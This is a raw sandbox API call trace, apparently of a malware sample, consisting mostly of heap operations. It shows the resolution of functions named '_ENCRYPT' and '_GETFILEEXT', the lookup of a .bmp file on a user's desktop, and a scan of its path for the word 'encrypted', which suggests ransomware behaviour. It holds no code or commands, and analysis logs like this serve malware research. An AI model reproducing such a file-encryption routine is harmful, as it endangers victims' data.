dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.156] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0032.157] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.157] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.158] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc40 [0032.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.158] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.159] CloseHandle (hObject=0x140) returned 1 [0032.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.159] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.159] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.160] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.160] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.160] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.160] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x3c201e00, ftLastWriteTime.dwHighDateTime=0x1d5c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 0x7c20c0 [0032.160] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x3c201e00, ftLastWriteTime.dwHighDateTime=0x1d5c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 0x7c20c0 [0032.160] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xhMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hMPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MPO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PO 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lfz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fz4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4yAr.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 